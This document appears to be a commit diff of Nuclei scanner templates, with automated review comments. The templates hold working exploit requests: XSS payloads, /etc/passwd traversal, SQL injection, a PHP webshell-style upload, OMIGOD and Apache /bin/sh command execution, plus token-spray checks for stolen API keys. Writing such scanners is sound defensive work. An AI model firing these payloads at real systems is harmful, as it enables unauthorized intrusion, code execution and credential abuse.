- "{{BaseURL}}/wp-content/plugins/sourceafrica/js/window.php?wpbase=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"
matchers-condition: and
matchers:
- type: word
words:
- '"></script><script>alert(document.domain)</script>'
part: body
- type: word
part: header
words:
- text/html
- type: status
status:
- 200

32
CVE-2015-7377.yaml Normal file

@ -0,0 +1,32 @@
id: CVE-2015-7377
info:
name: Pie-Register <= 2.0.18 - Unauthenticated Reflected Cross-Site Scripting (XSS)
author: daffainfo
severity: medium
reference:
- https://packetstormsecurity.com/files/133928/WordPress-Pie-Register-2.0.18-Cross-Site-Scripting.html
- https://nvd.nist.gov/vuln/detail/CVE-2015-7377
tags: cve,cve2015,wordpress,wp-plugin,xss
description: "Cross-site scripting (XSS) vulnerability in pie-register/pie-register.php in the Pie Register plugin before 2.0.19 for WordPress allows remote attackers to inject arbitrary web script or HTML via the invitaion_code parameter in a pie-register page to the default URI."
requests:
- method: GET
path:
- "{{BaseURL}}/?page=pie-register&show_dash_widget=1&invitaion_code=PC9zY3JpcHQ+PHNjcmlwdD5hbGVydChkb2N1bWVudC5kb21haW4pPC9zY3JpcHQ+"
matchers-condition: and
matchers:
- type: word
words:
- "</script><script>alert(document.domain)</script>"
part: body
- type: word
part: header
words:
- text/html
- type: status
status:
- 200
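Review bot: The base64 value in `invitaion_code` contains literal `+` characters, which ordinary query-string decoding turns into spaces. If the plugin reads the parameter through normal query parsing, the value that reaches its decoder differs from the intended one and the body matcher may not see the expected string, giving a false negative on an affected host. Percent-encode each `+` as `%2B` in the path.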

39
CVE-2015-7780.yaml Normal file

@ -0,0 +1,39 @@
id: CVE-2015-7780
info:
name: ManageEngine Firewall Analyzer 8.0 - Directory Traversal
author: daffainfo
severity: medium
description: Directory traversal vulnerability in ManageEngine Firewall Analyzer before 8.0.
reference:
- https://www.exploit-db.com/exploits/35933
- https://www.cvedetails.com/cve/CVE-2015-7780/
tags: cve,cve2015,lfi,manageengine
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N
cvss-score: 6.50
cve-id: CVE-2015-7780
cwe-id: CWE-22
requests:
- method: GET
path:
- "{{BaseURL}}/fw/mindex.do?url=./WEB-INF/web.xml%3f"
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
words:
- "</web-app>"
- "java.sun.com"
part: body
condition: and
- type: word
part: header
words:
- "application/xml"

37
CVE-2016-1000136.yaml Normal file

@ -0,0 +1,37 @@
id: CVE-2016-1000136
info:
name: heat-trackr v1.0 - XSS via heat-trackr_abtest_add.php
author: daffainfo
severity: medium
description: Reflected XSS in wordpress plugin heat-trackr v1.0
reference:
- http://www.vapidlabs.com/wp/wp_advisory.php?v=798
- https://nvd.nist.gov/vuln/detail/CVE-2016-1000136
tags: cve,cve2016,wordpress,xss,wp-plugin
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.10
cve-id: CVE-2016-1000136
cwe-id: CWE-79
requests:
- method: GET
path:
- "{{BaseURL}}/wp-content/plugins/heat-trackr/heat-trackr_abtest_add.php?id=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"
matchers-condition: and
matchers:
- type: word
words:
- '</script><script>alert(document.domain)</script>'
part: body
- type: word
part: header
words:
- text/html
- type: status
status:
- 200

37
CVE-2016-1000142.yaml Normal file

@ -0,0 +1,37 @@
id: CVE-2016-1000142
info:
name: MW Font Changer <= 4.2.5 - Unauthenticated Reflected Cross-Site Scripting (XSS)
author: daffainfo
severity: medium
description: The MW Font Changer WordPress plugin was affected by an Unauthenticated Reflected Cross-Site Scripting (XSS) security vulnerability.
reference:
- https://wpscan.com/vulnerability/4ff5d65a-ba61-439d-ab7f-745a0648fccc
- https://nvd.nist.gov/vuln/detail/CVE-2016-1000142
tags: cve,cve2016,wordpress,wp-plugin,xss
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.10
cve-id: CVE-2016-1000142
cwe-id: CWE-79
requests:
- method: GET
path:
- "{{BaseURL}}/wp-content/plugins/parsi-font/css.php?size=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"
matchers-condition: and
matchers:
- type: word
words:
- '</script><script>alert(document.domain)</script>'
part: body
- type: word
part: header
words:
- text/html
- type: status
status:
- 200

37
CVE-2016-1000143.yaml Normal file

@ -0,0 +1,37 @@
id: CVE-2016-1000143
info:
name: Photoxhibit v2.1.8 - Unauthenticated Reflected Cross-Site Scripting (XSS)
author: daffainfo
severity: medium
description: Reflected XSS in wordpress plugin photoxhibit v2.1.8
reference:
- http://www.vapidlabs.com/wp/wp_advisory.php?v=780
- https://nvd.nist.gov/vuln/detail/CVE-2016-1000143
tags: cve,cve2016,wordpress,wp-plugin,xss
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.10
cve-id: CVE-2016-1000143
cwe-id: CWE-79
requests:
- method: GET
path:
- "{{BaseURL}}/wp-content/plugins/photoxhibit/common/inc/pages/build.php?gid=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"
matchers-condition: and
matchers:
- type: word
words:
- '</script><script>alert(document.domain)</script>'
part: body
- type: word
part: header
words:
- text/html
- type: status
status:
- 200


@ -1,8 +1,8 @@
id: CVE-2018-15473
info:
name: OpenSSH Username Enumeration
author: r3dg33k,daffainfo
name: OpenSSH Username Enumeration <= v7.7
author: r3dg33k,daffainfo,forgedhallpass
severity: medium
description: OpenSSH through 7.7 is prone to a user enumeration vulnerability due to not delaying bailout for an invalid authenticating user until after the packet containing the request has been fully parsed, related to auth2-gss.c, auth2-hostbased.c, and auth2-pubkey.c.
reference: https://nvd.nist.gov/vuln/detail/CVE-2018-15473
@ -21,4 +21,9 @@ network:
matchers:
- type: regex
regex:
- 'SSH-2.0-OpenSSH_[1-7].*'
- '(?i)SSH-2.0-OpenSSH_(?:[1-6][^\d][^\r]+|7\.[0-7][^\d][^\r]+)'
extractors:
- type: regex
regex:
- '(?i)SSH-2.0-OpenSSH_[^\r]+'
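Review bot: The rewritten matcher regex in the second hunk still decides on the banner's version string alone, so a host running a distribution package with a backported fix for CVE-2018-15473 but an unchanged upstream version number would be reported at medium severity. Since nothing visible here tests the enumeration behaviour itself, I would state that in `description`, for example by appending `Detection is based on the SSH banner version only; backported fixes are not recognised.`, so findings are triaged as version matches. The dots in `SSH-2.0` are also unescaped in both the matcher and the new extractor; `SSH-2\.0` matches only the literal protocol string. The `network:` block starts above the hunk, so the probe itself is not visible.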

32
CVE-2018-9205.yaml Normal file
View File

@ -0,0 +1,32 @@
id: CVE-2018-9205
info:
name: Drupal avatar_uploader v7.x-1.0-beta8 - Arbitrary File Disclosure
author: daffainfo
severity: high
description: Vulnerability in avatar_uploader v7.x-1.0-beta8 , The code in view.php doesnt verify users or sanitize the file path.
reference:
- https://www.exploit-db.com/exploits/44501
- https://nvd.nist.gov/vuln/detail/CVE-2018-9205
tags: cve,cve2018,lfi,drupal
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.50
cve-id: CVE-2018-9205
cwe-id: CWE-22
requests:
- method: GET
path:
- "{{BaseURL}}/sites/all/modules/avatar_uploader/lib/demo/view.php?file=../../../../../../../../../../../etc/passwd"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200

50
CVE-2021-24499.yaml Normal file

@ -0,0 +1,50 @@
id: CVE-2021-24499
info:
name: Workreap WordPress theme - unauthenticated RCE
author: daffainfo
severity: critical
description: The AJAX actions workreap_award_temp_file_uploader and workreap_temp_file_uploader did not perform nonce checks, or validate that the request is from a valid user in any other way. The endpoints allowed for uploading arbitrary files to the uploads/workreap-temp directory. Uploaded files were neither sanitized nor validated, allowing an unauthenticated visitor to upload executable code such as php scripts.
reference:
- https://github.com/RyouYoo/CVE-2021-24499
- https://nvd.nist.gov/vuln/detail/CVE-2021-24499
tags: cve,cve2021,wordpress,wp-plugin,rce,intrusive
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.80
cve-id: CVE-2021-24499
cwe-id: CWE-434
requests:
- raw:
- |
POST /wp-admin/admin-ajax.php HTTP/1.1
Host: {{Hostname}}
Content-Type: multipart/form-data; boundary=------------------------cd0dc6bdc00b1cf9
X-Requested-With: XMLHttpRequest
-----------------------------cd0dc6bdc00b1cf9
Content-Disposition: form-data; name="action"
workreap_award_temp_file_uploader
-----------------------------cd0dc6bdc00b1cf9
Content-Disposition: form-data; name="award_img"; filename="{{randstr}}.php"
Content-Type: application/x-httpd-php
<?php echo md5("CVE-2021-24499"); ?>
-----------------------------cd0dc6bdc00b1cf9--
- |
GET /wp-content/uploads/workreap-temp/{{randstr}}.php HTTP/1.1
Host: {{Hostname}}
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
part: body
words:
- "71abe5077dae2754c36d731cc1534d4d"
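Review bot: The first raw request writes `{{randstr}}.php` into `uploads/workreap-temp` and nothing in the template removes it, so every positive scan leaves an executable file behind on the scanned site. The `intrusive` tag is present, but `description` should say this explicitly so operators plan the cleanup, e.g. append `This template uploads a harmless PHP file that remains on the target and must be removed after testing.` The `name` calls Workreap a theme while `tags` carries `wp-plugin`; `wp-theme` would keep tag-based filtering accurate.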

37
CVE-2021-30049.yaml Normal file

@ -0,0 +1,37 @@
id: CVE-2021-30049
info:
name: SysAid Technologies 20.3.64 b14 Reflected XSS
author: daffainfo
severity: medium
description: SysAid 20.3.64 b14 is affected by Cross Site Scripting (XSS) via a /KeepAlive.jsp?stamp= URI.
reference:
- https://eh337.net/2021/03/30/sysaid/
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-30049
tags: cve,cve2021,xss
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.10
cve-id: CVE-2021-30049
cwe-id: CWE-79
requests:
- method: GET
path:
- '{{BaseURL}}/KeepAlive.jsp?stamp=16170297%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
matchers-condition: and
matchers:
- type: word
words:
- "</script><script>alert(document.domain)</script>"
part: body
- type: word
part: header
words:
- "text/html"
- type: status
status:
- 200

68
CVE-2021-38647.yaml Normal file

@ -0,0 +1,68 @@
id: CVE-2021-38647
info:
name: OMIGOD - Open Management Infrastructure RCE
author: daffainfo,xstp
severity: critical
tags: cve,cve2021,rce,omi,microsoft
description: Open Management Infrastructure Remote Code Execution Vulnerability
reference:
- https://www.wiz.io/blog/omigod-critical-vulnerabilities-in-omi-azure
- https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-38647
- https://attackerkb.com/topics/08O94gYdF1/cve-2021-38647
- https://censys.io/blog/understanding-the-impact-of-omigod-cve-2021-38647/
- https://github.com/microsoft/omi
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.80
cve-id: CVE-2021-38647
requests:
- raw:
- |
POST /wsman HTTP/1.1
Host: {{Hostname}}
Content-Type: application/soap+xml;charset=UTF-8
<s:Envelope
xmlns:s="http://www.w3.org/2003/05/soap-envelope"
xmlns:a="http://schemas.xmlsoap.org/ws/2004/08/addressing"
xmlns:n="http://schemas.xmlsoap.org/ws/2004/09/enumeration"
xmlns:w="http://schemas.dmtf.org/wbem/wsman/1/wsman.xsd"
xmlns:xsi="http://www.w3.org/2001/XMLSchema"
xmlns:h="http://schemas.microsoft.com/wbem/wsman/1/windows/shell"
xmlns:p="http://schemas.microsoft.com/wbem/wsman/1/wsman.xsd">
<s:Header>
<a:To>HTTP://{{Hostname}}/wsman/</a:To>
<w:ResourceURI s:mustUnderstand="true">http://schemas.dmtf.org/wbem/wscim/1/cim-schema/2/SCX_OperatingSystem</w:ResourceURI>
<a:ReplyTo>
<a:Address s:mustUnderstand="true">http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous</a:Address>
</a:ReplyTo>
<a:Action>http://schemas.dmtf.org/wbem/wscim/1/cim-schema/2/SCX_OperatingSystem/ExecuteScript</a:Action>
<w:MaxEnvelopeSize s:mustUnderstand="true">102400</w:MaxEnvelopeSize>
<a:MessageID>uuid:00B60932-CC01-0005-0000-000000010000</a:MessageID>
<w:OperationTimeout>PT1M30S</w:OperationTimeout>
<w:Locale xml:lang="en-us" s:mustUnderstand="false"/>
<p:DataLocale xml:lang="en-us" s:mustUnderstand="false"/>
<w:OptionSet s:mustUnderstand="true"/>
<w:SelectorSet>
<w:Selector Name="__cimnamespace">root/scx</w:Selector>
</w:SelectorSet>
</s:Header>
<s:Body>
<p:ExecuteScript_INPUT
xmlns:p="http://schemas.dmtf.org/wbem/wscim/1/cim-schema/2/SCX_OperatingSystem">
<p:Script>aWQ=</p:Script>
<p:Arguments/>
<p:timeout>0</p:timeout>
<p:b64encoded>true</p:b64encoded>
</p:ExecuteScript_INPUT>
</s:Body>
</s:Envelope>
matchers:
- type: word
words:
- '<p:StdOut>'
- 'uid=0(root) gid=0(root) groups=0'
condition: and
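Review bot: The `info` block does not tell an operator that this check executes a command on the target: the SOAP body calls `ExecuteScript` with the base64 script `aWQ=` (`id`) and the matcher expects the `uid=0(root)` output. I would expand `description` to something like `Sends an ExecuteScript request without an Authorization header to the OMI /wsman endpoint and runs "id"; root output in the response confirms the issue.`, and consider whether the `intrusive` tag applies so that runs excluding such templates skip it. The `classification` block also lacks the `cwe-id` that the other templates in this commit carry.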

32
CVE-2021-39316.yaml Normal file

@ -0,0 +1,32 @@
id: CVE-2021-39316
info:
name: DZS Zoomsounds < 6.50 - Unauthenticated Arbitrary File Download
author: daffainfo
severity: high
description: The Zoomsounds plugin <= 6.45 for WordPress allows arbitrary files, including sensitive configuration files such as wp-config.php, to be downloaded via the `dzsap_download` action using directory traversal in the `link` parameter.
reference:
- https://wpscan.com/vulnerability/d2d60cf7-e4d3-42b6-8dfe-7809f87547bd
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-39316
tags: wordpress,cve2021,cve,lfi,wp-plugin
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.50
cve-id: CVE-2021-39316
cwe-id: CWE-22
requests:
- method: GET
path:
- "{{BaseURL}}/?action=dzsap_download&link=../../../../../../../../../../../../../etc/passwd"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200
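Review bot: `name` and `description` disagree on the affected range: the name says `< 6.50` while the description says `<= 6.45`. Whichever bound the advisory gives should appear in both, because the name is what shows up in scan reports and drives patch decisions. The matcher pair (`root:.*:0:0` plus status 200) only proves the traversal on hosts that have an `/etc/passwd`, so a Windows-hosted WordPress would not be flagged; that limitation deserves a sentence in `description`.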

37
CVE-2021-40868.yaml Normal file

@ -0,0 +1,37 @@
id: CVE-2021-40868
info:
name: Cloudron 6.2 Cross Site Scripting
author: daffainfo
severity: medium
description: In Cloudron 6.2, the returnTo parameter on the login page is vulnerable to Reflected XSS.
reference:
- https://packetstormsecurity.com/files/164255/Cloudron-6.2-Cross-Site-Scripting.html
- https://nvd.nist.gov/vuln/detail/CVE-2021-40868
tags: cve,cve2021,xss,cloudron
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.10
cve-id: CVE-2021-40868
cwe-id: CWE-79
requests:
- method: GET
path:
- '{{BaseURL}}/login.html?returnTo=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
part: header
words:
- "text/html"
- type: word
words:
- '</script><script>alert(document.domain)</script>'
part: body

32
CVE-2021-40960.yaml Normal file

@ -0,0 +1,32 @@
id: CVE-2021-40960
info:
name: Galera WebTemplate 1.0 Directory Traversal
author: daffainfo
severity: critical
description: Galera WebTemplate 1.0 is affected by a directory traversal vulnerability that could reveal information from /etc/passwd and /etc/shadow.
reference:
- http://www.omrylmz.com/galera-webtemplate-1-0-directory-traversal-vulnerability-cve-2021-40960/
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-40960
tags: cve,cve2021,lfi
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.80
cve-id: CVE-2021-40960
cwe-id: CWE-22
requests:
- method: GET
path:
- "{{BaseURL}}/GallerySite/filesrc/fotoilan/388/middle//.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/etc/passwd"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200

40
CVE-2021-41648.yaml Normal file

@ -0,0 +1,40 @@
id: CVE-2021-41648
info:
name: PuneethReddyHC online-shopping-system-advanced SQL Injection action.php
author: daffainfo
severity: high
description: An un-authenticated SQL Injection exists in PuneethReddyHC online-shopping-system-advanced through the /action.php prId parameter. Using a post request does not sanitize the user input.
reference: https://github.com/MobiusBinary/CVE-2021-41648
tags: cve,cve2021,sqli
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.50
cve-id: CVE-2021-41648
cwe-id: CWE-89
requests:
- method: POST
path:
- "{{BaseURL}}/action.php"
body: "proId=1'&addToCart=1"
matchers-condition: and
matchers:
- type: word
words:
- "text/html"
part: header
- type: word
words:
- "Warning: mysqli_num_rows() expects parameter 1 to be"
- "xdebug-error xe-warning"
part: body
condition: and
- type: status
status:
- 200
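Review bot: The second word matcher requires both the `mysqli_num_rows()` warning and `xdebug-error xe-warning`, so the template only fires on installs that have Xdebug loaded and errors displayed; a vulnerable production host with error display off, or without Xdebug, is reported clean. If the PHP warning text is the signal, I would drop the Xdebug word or switch that matcher to `condition: or`, and state the limitation in `description`. The description also names the parameter `prId` while the request body sends `proId`; one of them is a typo. CVE-2021-41649.yaml below uses the same matcher and has the same gap.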

39
CVE-2021-41649.yaml Normal file

@ -0,0 +1,39 @@
id: CVE-2021-41649
info:
name: PuneethReddyHC online-shopping-system-advanced SQL Injection homeaction.php
author: daffainfo
severity: critical
description: An un-authenticated SQL Injection exists in PuneethReddyHC online-shopping-system-advanced through the /homeaction.php cat_id parameter. Using a post request does not sanitize the user input.
reference: https://github.com/MobiusBinary/CVE-2021-41649
tags: cve,cve2021,sqli
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.80
cve-id: CVE-2021-41649
cwe-id: CWE-89
requests:
- method: POST
path:
- "{{BaseURL}}/homeaction.php"
body: "cat_id=4'&get_seleted_Category=1"
matchers-condition: and
matchers:
- type: word
words:
- "text/html"
part: header
- type: word
words:
- "Warning: mysqli_num_rows() expects parameter 1 to be"
- "xdebug-error xe-warning"
part: body
condition: and
- type: status
status:
- 200

47
CVE-2021-41773.yaml Normal file

@ -0,0 +1,47 @@
id: CVE-2021-41773
info:
name: Apache 2.4.49 - Path Traversal and Remote Code Execution
author: daffainfo
severity: high
description: A flaw was found in a change made to path normalization in Apache HTTP Server 2.4.49. An attacker could use a path traversal attack to map URLs to files outside the expected document root. If files outside of the document root are not protected by "require all denied" these requests can succeed. Additionally this flaw could leak the source of interpreted files like CGI scripts. This issue is known to be exploited in the wild. This issue only affects Apache 2.4.49 and not earlier versions.
reference:
- https://github.com/apache/httpd/commit/e150697086e70c552b2588f369f2d17815cb1782
- https://nvd.nist.gov/vuln/detail/CVE-2021-41773
- https://twitter.com/ptswarm/status/1445376079548624899
- https://twitter.com/h4x0r_dz/status/1445401960371429381
- https://github.com/blasty/CVE-2021-41773
tags: cve,cve2021,lfi,rce,apache,misconfig
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.50
cve-id: CVE-2021-41773
cwe-id: CWE-22
metadata:
shodan-query: https://www.shodan.io/search?query=apache+version%3A2.4.49
requests:
- raw:
- |
GET /cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd HTTP/1.1
Host: {{Hostname}}
- |
POST /cgi-bin/.%2e/%2e%2e/%2e%2e/bin/sh HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
echo Content-Type: text/plain; echo; echo COP-37714-1202-EVC | rev
matchers-condition: or
matchers:
- type: regex
name: LFI
regex:
- "root:.*:0:0"
- type: word
name: RCE
words:
- "CVE-2021-41773-POC"
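Review bot: `shodan-query` under `metadata` holds a full search URL rather than the query itself, so tooling that reads the field as a query string would search for the literal URL. I would store the decoded query instead, `shodan-query: 'apache version:2.4.49'`. Separately, with `matchers-condition: or` and no `part` or status check, either matcher is evaluated against every response of both raw requests; adding `part: body` to both keeps the intent explicit.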

31
api-abuseipdb.yaml Normal file

@ -0,0 +1,31 @@
id: api-abuseipdb
info:
name: AbuseIPDB API Test
author: daffainfo
severity: info
reference:
- https://docs.abuseipdb.com/
- https://github.com/daffainfo/all-about-apikey/blob/main/Anti-Malware/AbuseIPDB.md
tags: token-spray,abuseipdb
self-contained: true
requests:
- raw:
- |
POST https://api.abuseipdb.com/api/v2/report HTTP/1.1
Host: api.abuseipdb.com
Key: {{token}}
Accept: application/json
Content-Type: application/x-www-form-urlencoded
Content-Length: 16
ip=127.0.0.1&categories=18,22&comment=SSH%20login%20attempts%20with%20user%20root.
matchers:
- type: word
part: body
words:
- 'data":'
- 'ipAddress":'
condition: and
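Review bot: Validating a key by POSTing to `/api/v2/report` is a state-changing call: every sprayed token that turns out to be valid files an abuse report for 127.0.0.1 under that key's account. A read-only endpoint gives the same yes/no answer, for example `GET https://api.abuseipdb.com/api/v2/check?ipAddress=127.0.0.1 HTTP/1.1` with the same `Key` and `Accept` headers. The hard-coded `Content-Length: 16` also does not match the body on the following line, which is far longer than 16 bytes; removing the header together with the body avoids relying on the engine to correct it.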

26
api-alienvault.yaml Normal file

@ -0,0 +1,26 @@
id: api-alienvault
info:
name: AlienVault Open Threat Exchange (OTX) API Test
author: daffainfo
severity: info
reference:
- https://otx.alienvault.com/api
- https://github.com/daffainfo/all-about-apikey/blob/main/Anti-Malware/AlienVault%20Open%20Threat%20Exchange.md
tags: token-spray,alienvault
self-contained: true
requests:
- raw:
- |
GET https://otx.alienvault.com/api/v1/pulses/subscribed?page=1 HTTP/1.1
Host: otx.alienvault.com
X-OTX-API-KEY: {{token}}
matchers:
- type: word
part: body
words:
- '"$schema":'
- '"properties":'
condition: and

26
api-aniapi.yaml Normal file

@ -0,0 +1,26 @@
id: api-aniapi
info:
name: AniAPI API Test
author: daffainfo
severity: info
reference:
- https://aniapi.com/docs/authentication
- https://github.com/daffainfo/all-about-apikey/blob/main/Anime/AniAPI.md
tags: token-spray,aniapi
self-contained: true
requests:
- method: GET
path:
- "https://api.aniapi.com/v1/auth/me"
headers:
Authorization: Bearer {{token}}
matchers:
- type: word
part: body
words:
- '"username":'
- '"data":'
condition: and

21
api-cooperhewitt.yaml Normal file

@ -0,0 +1,21 @@
id: api-cooperhewitt
info:
name: Cooper Hewitt API
author: daffainfo
severity: info
reference:
- https://collection.cooperhewitt.org/api/methods/
- https://github.com/daffainfo/all-about-apikey/blob/main/Art-Design/Cooper%20Hewitt.md
tags: token-spray,cooperhewitt
self-contained: true
requests:
- method: GET
path:
- "https://api.collection.cooperhewitt.org/rest/?method=api.spec.formats&access_token={{token}}"
matchers:
- type: status
status:
- 200
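Review bot: A lone `status: 200` matcher treats any successful HTTP response as proof that the token is valid; if the API answers 200 with an error payload for a bad token (not verifiable from this page), every token is reported as working. Most other token-spray templates in this commit pair the request with body words, and this one should too: a `type: word`, `part: body` matcher on a field that only appears in an authenticated response. api-dribbble.yaml and api-europeana.yaml below have the same status-only matcher.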

25
api-covalent.yaml Normal file

@ -0,0 +1,25 @@
id: api-covalent
info:
name: Covalent API Test
author: daffainfo
severity: info
reference:
- https://www.covalenthq.com/docs/api/
- https://github.com/daffainfo/all-about-apikey/blob/main/Blockchain/Covalent.md
tags: token-spray,covalent
self-contained: true
requests:
- method: GET
path:
- "https://api.covalenthq.com/v1/3/address/balances_v2/?&key={{token}}"
matchers:
- type: word
part: body
words:
- '"address":'
- '"updated_at":'
- '"next_update_at":'
condition: and

21
api-dribbble.yaml Normal file

@ -0,0 +1,21 @@
id: api-dribbble
info:
name: Dribbble API Test
author: daffainfo
severity: info
reference:
- https://developer.dribbble.com/v2/
- https://github.com/daffainfo/all-about-apikey/blob/main/Art-Design/Dribbble.md
tags: token-spray,dribbble
self-contained: true
requests:
- method: GET
path:
- "https://api.dribbble.com/v2/user?access_token={{token}}"
matchers:
- type: status
status:
- 200

31
api-etherscan.yaml Normal file

@ -0,0 +1,31 @@
id: api-etherscan
info:
name: Etherscan API Test
author: daffainfo
severity: info
reference:
- https://docs.etherscan.io/
- https://github.com/daffainfo/all-about-apikey/blob/main/Blockchain/Etherscan.md
tags: token-spray,etherscan
self-contained: true
requests:
- method: GET
path:
- "https://api.etherscan.io/api?module=account&action=balance&address=0xde0b295669a9fd93d5f28d9ec85e40f4cb697bae&tag=latest&apikey={{token}}"
matchers-condition: and
matchers:
- type: word
part: body
negative: true
words:
- 'Invalid API Key'
- type: word
part: body
words:
- '"status":'
- '"message":"OK"'
condition: and

21
api-europeana.yaml Normal file

@ -0,0 +1,21 @@
id: api-europeana
info:
name: Europeana API Test
author: daffainfo
severity: info
reference:
- https://pro.europeana.eu/page/search
- https://github.com/daffainfo/all-about-apikey/blob/main/Art-Design/Europeana.md
tags: token-spray,europeana
self-contained: true
requests:
- method: GET
path:
- "https://api.europeana.eu/record/v2/search.json?wskey={{token}}&query=*&rows=0&profile=facets"
matchers:
- type: status
status:
- 200

28
api-iconfinder.yaml Normal file

@ -0,0 +1,28 @@
id: api-iconfinder
info:
name: IconFinder API Test
author: daffainfo
severity: info
reference:
- https://developer.iconfinder.com/reference/overview-1
- https://github.com/daffainfo/all-about-apikey/blob/main/Art-Design/IconFinder.md
tags: token-spray,iconfinder
self-contained: true
requests:
- raw:
- |
GET https://api.iconfinder.com/v4/icons/search?query=arrow&count=10 HTTP/1.1
Host: api.iconfinder.com
Accept: application/json
Authorization: Bearer {{token}}
matchers:
- type: word
part: body
words:
- '"icons":'
- '"is_icon_glyph":'
- '"download_url":'
condition: and

25
api-iucn.yaml Normal file

@ -0,0 +1,25 @@
id: api-iucn
info:
name: IUCN API Test
author: daffainfo
severity: info
reference:
- http://apiv3.iucnredlist.org/api/v3/docs
- https://github.com/daffainfo/all-about-apikey/blob/main/Animals/IUCN.md
tags: token-spray,iucn
self-contained: true
requests:
- method: GET
path:
- "http://apiv3.iucnredlist.org/api/v3/country/list?token={{token}}"
matchers:
- type: word
part: body
words:
- 'taxonid'
- 'scientific_name'
- 'subspecies'
condition: and
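Review bot: The request URL is plain `http://`, so `{{token}}` travels in cleartext in the query string on every run. If the service answers over TLS, the path should be `"https://apiv3.iucnredlist.org/api/v3/country/list?token={{token}}"`. The matcher words `taxonid`, `scientific_name` and `subspecies` look like species fields rather than what a country list would return; this is worth confirming against a real response, because otherwise valid tokens would never match.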


@ -0,0 +1,34 @@
id: api-micro-user-service
info:
name: Micro User Service API Test
author: daffainfo
severity: info
reference:
- https://m3o.com/user
- https://github.com/daffainfo/all-about-apikey/blob/main/Authentication/Micro%20User%20Service.md
tags: token-spray,micro-user-service
self-contained: true
requests:
- raw:
- |
POST https://api.m3o.com/v1/user/Read HTTP/1.1
Host: api.m3o.com
Content-Type: application/json
Authorization: Bearer {{token}}
Content-Length: 21
{
"id": "usrid-1"
}
matchers:
- type: word
part: body
words:
- '"username":'
- '"email":'
- '"created":'
- '"updated":'
condition: and

Some files were not shown because too many files have changed in this diff Show More